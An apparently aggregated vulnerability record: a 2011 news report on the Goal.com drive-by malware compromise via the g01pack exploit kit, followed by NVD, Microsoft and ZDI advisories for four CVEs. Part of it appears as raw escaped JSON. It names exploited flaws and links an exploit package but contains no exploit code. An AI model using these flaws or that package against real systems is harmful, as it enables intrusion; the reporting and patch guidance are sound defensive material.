ID THREATPOST:F143FEE5D0268A8FD7B954FDAD0944A7 Type threatpost Reporter Brian Donohue Modified 2013-04-17T20:08:50
Description
Goal.com, a popular football (aka “soccer” for all us Yanks) news site was hacked and found serving malware via drive-by-downloads between April 27 and 28, according to a post by Web security firm Armorize.
In an analysis of the attack, Armorize researcher Wayne Huang suggests that a hacker specifically targeted and compromised Goal.com through a back-door that allowed the attacker to manipulate the site’s content at will. Researchers at Armorize said the attacks appear to be specific to Goal.com, which ranks 379th on Alexa.com’s list of the world’s top Web sites. That suggests the compromise is not part of a mass SQL injection campaign.
According to the report, Goal.com was detected on April 27 and 28, 2011 serving up an iframe attack that forwarded visitors to a rogue domain in the .cc top level domain (TLD). That redirect was the first in a chain of events that resulted in the delivery of a known exploit pack, g01pack, that targets attacks at the specific operating system and browser version the Goal.com visitor is using. After exploiting the user’s browser, further malware, including a Trojan horse program, was downloaded to the victim’s computer.
The number of users compromised after they visited Goal.com isn’t known. The site receives anywhere between 215,000 and 232,000 daily unique page views, according to alexa.com.
As is often the case, the domains used to deliver the malware were not identified by AV products as malicious or blacklisted by Google’s SafeBrowsing feature, a fact that Huang claims fortifies the argument that these are targeted attacks.
According to the post, Armorize scanners became aware of the attack when the hacker responsible started testing injections at Goal.com. The browser exploits used during the test were CVE-2010-1423, a Java vulnerability, CVE-2010-1885 (Microsoft’s Help Center), as well as CVE-2009-0927 for PDF, and CVE-2006-0003 affecting Microsoft’s MDAC.
The attacker used the g01pack exploit kit, which has a fake admin page used as a honeynet for researchers, allowing the attacker to keep track of anyone attempting to research his work. The exploit codes were also mutated to avoid further detection.
Attacks such as this one represent a trend in malware distribution. Security researchers have noted for some time that reputable Web sites are high value targets for online scammers, who want to take advantage of their large visitor traffic and high search engine ranking. In February, 2010, Kaspersky Lab researchers reported that one in every 150 legitimate Web sites was hosting malicious content, leveraging holes in legitimate sites to push malware to their unsuspecting guests.

Title Popular Sports Site Goal.com Serves Malware
Published 2011-05-03T19:05:02
Source https://threatpost.com/popular-sports-site-goalcom-serves-malware-050311/75196/
CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE)
CVEs CVE-2006-0003, CVE-2009-0927, CVE-2010-1423, CVE-2010-1885

References
https://threatpost.com/popular-sports-site-goalcom-serves-malware-050311/
http://blog.armorize.com/2011/05/goalcom-serving-malware.html
http://www.alexa.com/siteinfo/goal.com
https://threatpost.com/legitimate-sites-fertile-ground-malware-091509/
https://threatpost.com/one-every-150-legitimate-sites-infected-malware-020310/
https://threatpost.com/hartford-hacked-040711/
https://threatpost.com/education-goverment-sites-still-serving-scammers-months-later-041411/
https://threatpost.com/malicious-ads-serving-malware-spotify-users-032511/
Related CVE records (NVD)

CVE-2010-1885
Published 2010-06-15. CWE-78. CVSS v2 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C). https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1885
The MPC::HexToNum function in helpctr.exe in Microsoft Windows Help and Support Center in Windows XP and Windows Server 2003 does not properly handle malformed escape sequences, which allows remote attackers to bypass the trusted documents whitelist (fromHCP option) and execute arbitrary commands via a crafted hcp:// URL, aka "Help Center URL Validation Vulnerability."
Per http://blogs.technet.com/b/msrc/archive/2010/06/10/windows-help-vulnerability-disclosure.aspx: "customers running Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2, are not vulnerable to this issue, or at risk of attack."
Affected platforms: Windows XP (SP2, SP3, x64 SP2), Windows Server 2003 SP2 (including Itanium).

CVE-2009-0927
Published 2009-03-19. CWE-20. CVSS v2 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C). https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0927
Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3, and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
Per the vendor advisory (http://www.adobe.com/support/security/bulletins/apsb09-04.html): "The Adobe Reader and Acrobat 9.1 and 7.1.1 updates resolve an input validation issue in a JavaScript method that could potentially lead to remote code execution. This issue has already been resolved in Adobe Reader 8.1.3 and Acrobat 8.1.3. (CVE-2009-0927)"

CVE-2010-1423
Published 2010-04-15. CWE-78. CVSS v2 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C). https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1423
Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when running on Windows and possibly on Linux, allows remote attackers to execute arbitrary code via the (1) -J or (2) -XXaltjvm argument to javaws.exe, which is processed by the launch method. NOTE: some of these details are obtained from third party information.
Affected platforms: Oracle JRE and JDK 1.6.0 Update 10 and Update 19.

CVE-2006-0003
Published 2006-04-12. CVSS v2 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P). https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0003
Unspecified vulnerability in the RDS.Dataspace ActiveX control, which is contained in ActiveX Data Objects (ADO) and distributed in Microsoft Data Access Components (MDAC) 2.7 and 2.8, allows remote attackers to execute arbitrary code via unknown attack vectors.
Affected platforms: MDAC 2.5 SP3, 2.7, 2.7 SP1, 2.8, 2.8 SP1, 2.8 SP2.

Related securityvulns records

SECURITYVULNS:DOC:22414 (2009-09-04) Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Exploit and Report (CVE-2009-0927)
Hi everyone,
I published some work I did concerning the adobe reader Collab.getIcon() buffer overflow. You can find the package (exploit/report/payload) on: http://www.coromputer.net/CVE-2009-0927_package.zip
Cheers,
Ivan Rodriguez Almuina
kralor - [HiC] && [Crpt]

SECURITYVULNS:VULN:10990 (2010-07-14) Microsoft Windows Help and Support Center code execution (CVE-2010-1885)
Code injection via URL.

Microsoft Security Bulletin MS10-042 - Critical (CVE-2010-1885)
Vulnerability in Help and Support Center Could Allow Remote Code Execution (2229593)
Published: July 13, 2010
Version: 1.0

General Information

Executive Summary
This security update resolves a publicly disclosed vulnerability in the Windows Help and Support Center feature that is delivered with supported editions of Windows XP and Windows Server 2003. This vulnerability could allow remote code execution if a user views a specially crafted Web page using a Web browser or clicks a specially crafted link in an e-mail message. The vulnerability cannot be exploited automatically through e-mail. For an attack to be successful, a user must click a link listed within an e-mail message.
This security update is rated Critical for all supported editions of Windows XP, and Low for all supported editions of Windows Server 2003. For more information, see the subsection, Affected and Non-Affected Software, in this section.
The security update addresses the vulnerability by modifying the manner in which data is validated when passed to the Windows Help and Support Center. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
This security update also addresses the vulnerability first described in Microsoft Security Advisory 2219475.
Recommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.
For administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.
See also the section, Detection and Deployment Tools and Guidance, later in this bulletin.
Known Issues. None

Affected and Non-Affected Software
The following software has been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.

Affected Software (Operating System; Maximum Security Impact; Aggregate Severity Rating; Bulletins Replaced by this Update)
Windows XP Service Pack 2 and Windows XP Service Pack 3; Remote Code Execution; Critical; None
Windows XP Professional x64 Edition Service Pack 2; Remote Code Execution; Critical; None
Windows Server 2003 Service Pack 2; Remote Code Execution; Low; None
Windows Server 2003 x64 Edition Service Pack 2; Remote Code Execution; Low; None
Windows Server 2003 with SP2 for Itanium-based Systems; Remote Code Execution; Low; None

Non-Affected Software (Operating System)
Microsoft Windows 2000 Service Pack 4
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems

Frequently Asked Questions (FAQ) Related to This Security Update

Where are the file information details?
Refer to the reference tables in the Security Update Deployment section for the location of the file information details.

I am using an older release of the software discussed in this security bulletin. What should I do?
The affected software listed in this bulletin has been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.
It should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.
Customers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.

Vulnerability Information

Severity Ratings and Vulnerability Identifiers
The following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the July bulletin summary. For more information, see Microsoft Exploitability Index.

Vulnerability Severity Rating and Maximum Security Impact by Affected Software (Affected Software; Help Center URL Validation Vulnerability - CVE-2010-1885; Aggregate Severity Rating)
Windows XP Service Pack 2 and Windows XP Service Pack 3; Critical, Remote Code Execution; Critical
Windows XP Professional x64 Edition Service Pack 2; Critical, Remote Code Execution; Critical
Windows Server 2003 Service Pack 2; Low, Remote Code Execution; Low
Windows Server 2003 x64 Edition Service Pack 2; Low, Remote Code Execution; Low
Windows Server 2003 with SP2 for Itanium-based Systems; Low, Remote Code Execution; Low

Help Center URL Validation Vulnerability - CVE-2010-1885
An unauthenticated remote code execution vulnerability exists in the way that the Microsoft Help and Support Center validates specially crafted URLs. This vulnerability could allow remote code execution if a user views a specially crafted Web page using a Web browser or clicks a specially crafted link in an e-mail message. An attacker who successfully exploited this vulnerability could execute arbitrary code and take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-1885.

Mitigating Factors for Help Center URL Validation Vulnerability - CVE-2010-1885
Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:
• In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.
• The vulnerability cannot be exploited automatically through e-mail. For an attack to be successful a user must click a link listed within an e-mail message.
• An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Workarounds for Help Center URL Validation Vulnerability - CVE-2010-1885
Workaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

• Unregister the HCP Protocol
Note: See Microsoft Knowledge Base Article 2229593 to use the automated Microsoft Fix it solution to enable or disable this workaround.
Note: Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.
Unregistering the HCP Protocol prevents this issue from being exploited on affected systems.

Using the Interactive Method
1. Click Start, click Run, type Regedit in the Open box, and then click OK.
2. Locate and then click the following registry key:
   HKEY_CLASSES_ROOT\HCP
3. Click the File menu and select Export.
4. In the Export Registry File dialog box, enter HCP_Procotol_Backup.reg and click Save.
   Note: This will create a backup of this registry key in the My Documents folder by default.
5. Press the Delete key on the keyboard to delete the registry key. When prompted to delete the registry key via the Confirm Key Delete dialog box, click Yes.

Using a Managed Deployment Script
1. Create a backup copy of the registry keys by using a managed deployment script that contains the following commands:
   Regedit.exe /e HCP_Protocol_Backup.reg HKEY_CLASSES_ROOT\HCP
2. Next, save the following to a file with a .REG extension, such as Disable_HCP_Protocol.reg:
   Windows Registry Editor Version 5.00
   [-HKEY_CLASSES_ROOT\HCP]
3. Run the above registry script on the target machine with the following command from an elevated command prompt:
   Regedit.exe /s Disable_HCP_Protocol.reg

Impact of Workaround: Unregistering the HCP protocol will break all local, legitimate help links that use hcp://. For example, links in Control Panel may no longer work.

How to undo the workaround
Using the interactive method
1. Click Start, click Run, type Regedit in the Open box, and then click OK.
2. Click the File menu and select Import.
3. In the Import Registry File dialog box, select HCP_Procotol_Backup.reg and click Open.
Using a Managed Deployment Script
• Restore the original state by running the following command:
   Regedit.exe /s HCP_Protocol_Backup.reg

FAQ for Help Center URL Validation Vulnerability - CVE-2010-1885

What is the scope of the vulnerability?
This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

What causes the vulnerability?
The Windows Help and Support Center does not properly validate URLs when using the HCP Protocol.

What is the Help and Support Center?
Help and Support Center (HSC) is a feature in Windows that provides help on a variety of topics. For instance, HSC enables users to learn about Windows features, download and install software updates, determine whether a particular hardware device is compatible with Windows, get assistance from Microsoft, and so forth. Users and programs can execute URL links to Help and Support Center by using the "hcp://" prefix in a URL link.

What is the HCP Protocol?
Similar to the HTTP protocol which is used to execute URL links to open a Web browser, the HCP protocol can be used to execute URL links to open the Help and Support Center feature.

Are third-party applications directly affected by this issue?
No. However, this issue may be exploited through Web transactions, regardless of web browser type. In a Web-based attack scenario, an attacker would have to host a Web page that contains a specially crafted URI. Any application that is capable of handling the HCP protocol may be used as a vector to exploit this issue.

Why is this vulnerability rated as a lower severity on Windows Server 2003?
The vulnerability exists in Windows Server 2003, but we have not found a method for exploiting the vulnerability remotely on servers running Windows Server 2003. Nevertheless, this update addresses the vulnerability for Windows Server 2003 to remove the described threat of a remote vector.

What is a URI?
A Uniform Resource Identifier (URI) is a string of characters used to act on or identify resources from the Internet or over a network. A URL is a typical example of a URI that references a resource such as a Web site. For more information about URIs, see RFC-2396.

What might an attacker use the vulnerability to do?
If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

How could an attacker exploit the vulnerability?
An attacker could host a specially crafted Web site that is designed to exploit this vulnerability through a Web browser and then convince a user to view the Web site. This can also include compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or in an Instant Messenger request that takes users to the attacker's Web site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.

What systems are primarily at risk from the vulnerability?
Windows XP systems are primarily at risk from this vulnerability. Windows Server 2003 systems are also at risk, but we have not been able to find a way to exploit this issue remotely on Windows Server 2003.

What does the update do?
This update addresses this vulnerability by modifying the manner in which data is validated when passed to the Windows Help and Support Center.

When this security bulletin was issued, had this vulnerability been publicly disclosed?
Yes. This vulnerability has been publicly disclosed.
It has been assigned Common Vulnerability and Exposure number CVE-2010-1885. The vulnerability was first described in Microsoft Security Advisory 2219475.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nYes. Microsoft is aware of active attacks attempting to exploit the vulnerability. Based on the samples analyzed, Windows Server 2003 systems are not currently at risk from these attacks.\r\n\r\nOther Information\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. 
Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (July 13, 2010): Bulletin published.", "edition": 1, "modified": "2010-07-14T00:00:00", "published": "2010-07-14T00:00:00", "id": "SECURITYVULNS:DOC:24211", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24211", "title": "Microsoft Security Bulletin MS10-042 - Critical Vulnerability in Help and Support Center Could Allow Remote Code Execution (2229593)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:29", "bulletinFamily": "software", "cvelist": ["CVE-2009-0927"], "description": "ZDI-09-014: Adobe Acrobat getIcon() Stack Overflow Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-014\r\nMarch 24, 2009\r\n\r\n-- CVE ID:\r\nCVE-2009-0927\r\n\r\n-- Affected Vendors:\r\nAdobe\r\n\r\n-- Affected Products:\r\nAdobe Acrobat\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 6255.\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Adobe Acrobat and Adobe Reader. 
User\r\ninteraction is required in that a user must visit a malicious web site\r\nor open a malicious file.\r\n\r\nThe specific flaw exists when processing malicious JavaScript contained\r\nin a PDF document. When supplying a specially crafted argument to the\r\ngetIcon() method of a Collab object, proper bounds checking is not\r\nperformed resulting in a stack overflow. If successfully exploited full\r\ncontrol of the affected machine running under the credentials of the\r\ncurrently logged in user can be achieved.\r\n\r\n-- Vendor Response:\r\nAdobe has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb09-04.html\r\n\r\n-- Disclosure Timeline:\r\n2008-07-03 - Vulnerability reported to vendor\r\n2009-03-24 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Tenable Network Security\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "edition": 1, "modified": "2009-03-25T00:00:00", "published": "2009-03-25T00:00:00", "id": "SECURITYVULNS:DOC:21522", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21522", "title": "ZDI-09-014: Adobe Acrobat getIcon() Stack Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:17", "bulletinFamily": "software", "cvelist": ["CVE-2006-0003"], "description": "Microsoft Security Bulletin MS06-014\r\nVulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)\r\nPublished: April 11, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho should read this document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update at the earliest opportunity.\r\n\r\nSecurity Update Replacement: None\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 1 running Microsoft Data Access Components 2.7 Service Pack 1 - Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 2 running Microsoft Data Access Components 2.8 Service Pack 1 \u2013 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Professional x64 Edition running Microsoft Data Access Components 2.8 Service Pack 2 - Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 running 
Microsoft Data Access Components 2.8 - Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 Service Pack 1 running Microsoft Data Access Components 2.8 Service Pack 2 \u2013 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems running Microsoft Data Access Components 2.8 - Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 with SP1 for Itanium-based Systems running Microsoft Data Access Components 2.8 Service Pack 2 - Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 x64 Edition running Microsoft Data Access Components 2.8 Service Pack 2 - Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME) \u2013 Review the FAQ section of this bulletin for details about these operating systems.\r\n\r\nTested Microsoft Windows Components:\r\n\r\nAffected Components:\r\n\u2022\t\r\n\r\nWindows 2000 Service Pack 4 with Microsoft Data Access Components 2.5 Service Pack 3 installed - Download the update\r\n\u2022\t\r\n\r\nWindows 2000 Service Pack 4 with Microsoft Data Access Components 2.7 Service Pack 1 installed - Download the update\r\n\u2022\t\r\n\r\nWindows 2000 Service Pack 4 with Microsoft Data Access Components 2.8 installed - Download the update\r\n\u2022\t\r\n\r\nWindows 2000 Service Pack 4 with Microsoft Data Access Components 2.8 Service Pack 1 installed - Download the update\r\n\u2022\t\r\n\r\nWindows XP Service Pack 1 with Microsoft Data Access Components 2.8 installed - Download the update\r\n\r\nNote The \u201cAffected Software\u201d section applies to MDAC that shipped with a Microsoft Windows operating system. 
The \u201cAffected Components\u201d section applies to MDAC that was downloaded and installed onto a Microsoft Windows operating system.\r\n\r\nNote Microsoft strongly recommends that all customers who currently use a version of Windows that does not have Microsoft Data Access Components 2.7 Service Pack 1 or higher upgrade immediately to Microsoft Data Access Components 2.8 Service Pack 1 or another supported version. The only exception to this notice is customers who currently use Windows 2000 Service Pack 4 running Microsoft Data Access Components 2.5 Service Pack 3. See Knowledge Base Article 915387 for more information.\r\n\r\nNote The security updates for Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 also apply to Microsoft Windows Server 2003 R2.\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nGeneral Information\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a newly-discovered, privately-reported vulnerability. The vulnerability is documented in the \u201cVulnerability Details\u201d section of this bulletin.\r\n\r\nIf a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWe recommend that customers apply the update immediately.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\n\r\nVulnerability Identifier: Microsoft Windows MDAC Vulnerability - CVE-2006-0003\r\nImpact of Vulnerability: Remote Code Execution\r\nWindows 98, Windows 98 SE and Windows ME: Critical\r\nWindows 2000 Service Pack 4: Critical\r\nWindows XP Service Pack 1 and Windows XP Service Pack 2: Critical\r\nWindows Server 2003 and Windows Server 2003 Service Pack 1: Moderate\r\n\r\nNote All versions of Microsoft Data Access Components (MDAC) for the affected operating system have the same severity rating of Critical.\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote The severity ratings for non-x86 operating system versions map to the x86 operating systems versions as follows:\r\n\u2022\t\r\n\r\nThe Microsoft Windows XP Professional x64 Edition severity rating is the same as the Windows XP Service Pack 2 severity rating.\r\n\u2022\t\r\n\r\nThe Microsoft Windows Server 2003 R2 Systems severity rating is the same as the Windows Server 2003 severity rating.\r\n\u2022\t\r\n\r\nThe Microsoft Windows Server 2003 for Itanium-based Systems severity rating is the same as the Windows Server 2003 severity rating.\r\n\u2022\t\r\n\r\nThe Microsoft Windows Server 2003 with SP1 for Itanium-based Systems severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\u2022\t\r\n\r\nThe Microsoft Windows Server 2003 x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\r\nFrequently asked questions 
(FAQ) related to this security update\r\n\r\nCan I detect what version of MDAC is installed on my system?\r\nYes, there is a tool available that you can use to determine the version of MDAC that you have installed on your system. For more information about how to install and use this tool, see Microsoft Knowledge Base Article 301202. For information about the different MDAC versions that are available and the products that install them, see Microsoft Knowledge Base Article 231943.\r\n\r\nI am currently using Microsoft Data Access Components 2.6 or 2.6 Service Pack 1. Why do I need to upgrade to version 2.8 Service Pack 1 of Microsoft Data Access Components?\r\nMicrosoft Data Access Components 2.6 and Microsoft Data Access Components 2.6 Service Pack 1 have reached the end of their support life cycles. It should be a priority for customers who have these versions to migrate to the supported version. The supported version is Microsoft Data Access Components 2.8 Service Pack 1.\r\n\r\nDoes this update contain any changes to functionality?\r\nYes. The RDS.Dataspace ActiveX control that is provided in MDAC contains additional restrictions that affect the way that it interacts within Internet Explorer. These restrictions may interfere with the normal operation of some applications if those applications load the RDS.Database ActiveX control within Internet Explorer.\r\n\r\nWhat is the Internet Explorer Enhanced Security Configuration?\r\nInternet Explorer Enhanced Security Configuration is a group of preconfigured Internet Explorer settings that reduce the likelihood of a user or of an administrator downloading and running malicious Web content on a server. Internet Explorer Enhanced Security Configuration reduces this risk by modifying many security-related settings. This includes the settings on the Security tab and the Advanced tab in the Internet Options dialog box. 
Some of the important modifications include the following:\r\n\u2022\t\r\n\r\nSecurity level for the Internet zone is set to High. This setting disables scripts, ActiveX controls, Microsoft Java Virtual Machine (MSJVM), and file downloads.\r\n\u2022\t\r\n\r\nAutomatic detection of intranet sites is disabled. This setting assigns all intranet Web sites and all Universal Naming Convention (UNC) paths that are not explicitly listed in the Local intranet zone to the Internet zone.\r\n\u2022\t\r\n\r\nInstall On Demand and non-Microsoft browser extensions are disabled. This setting prevents Web pages from automatically installing components and prevents non-Microsoft extensions from running.\r\n\u2022\t\r\n\r\nMultimedia content is disabled. This setting prevents music, animations, and video clips from running.\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. Extended security update support for Microsoft Windows 2000 Service Pack 3 ended on June 30, 2005. I am still using one of these operating systems, what should I do?\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. 
